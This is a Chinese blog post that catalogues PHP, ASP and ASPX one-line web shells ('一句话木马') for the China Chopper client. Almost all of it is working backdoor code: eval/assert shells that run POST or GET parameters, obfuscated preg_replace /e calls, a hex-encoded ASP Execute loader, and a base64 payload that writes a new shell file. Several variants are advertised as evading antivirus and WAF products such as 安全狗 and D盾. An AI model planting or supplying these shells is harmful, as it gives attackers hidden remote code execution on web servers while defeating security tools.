站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。
整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。
看多了之后 自然可以干掉木马……
PHP一句话木马
1、 $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、 $filename=$_GET['xbid']; include ($filename); //危险的include函数,直接编译任何文件为php格式运行 3、 $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、 $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $gzid("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 5、include ($uid); //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif //gif插一句话 6、典型一句话 程序后门代码 <?php eval_r($_POST[sb])?> 程序代码 <?php @eval_r($_POST[sb])?> //容错代码 程序代码 <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句 程序代码 <?$_POST['sa']($_POST['sb']);?> 程序代码 <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 程序代码 <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 程序代码 <O>h=@eval_r($_POST1);</O> 程序代码 <script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话
<?php ($_=@$_GET[2]).@$_($_POST[1])?>在菜刀里写http://site/1.php?2=assert密码是1
<?php
$item[‘wind’] = 'assert';
$array[] = $item;
$array[0][‘wind’]($_POST[‘pass’]);
?>密码:123
<script language="php">@eval_r($_POST[mima])</script> //绕过<?限制的一句话 部分软件会拦截 <?
<?php @preg_replace(“/[email]/e”,$_POST[‘h’],”error”); ?>
菜刀附加数据:
<O>h=@eval($_POST[c]);</O>
[email]和error你看着换吧,怎么隐蔽怎么来
密码 c
超级隐蔽的PHP后门:
<?php $_GET[a]($_GET[b]);?>
仅用GET函数就构成了木马;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
ASP一句话木马
<%
password=Request(“Class”)
Execute(AACode(“457865637574652870617373776F726429″)):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(“AACode=AACode&chr(&H”&c&”)”):Else:Execute(“AACode=AACode&chr(&H”&c&Mid(s,i+2,2)&”)”):i=i+2:End If:Next:End Function
%>
密码 Class
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script> // 这个是ASPX的一句话 密码是webadmin
<% // 过安全狗的ASP一句话木马
dim play
'
'
''''''''''''''''''
'''''''''
play = request("www.exehack.net")
%>
Error
<%
execute(play)
%>
待更新 … …
转载请保留出处:无极领域 » ASP/PHP一句话木马过安全狗等杀软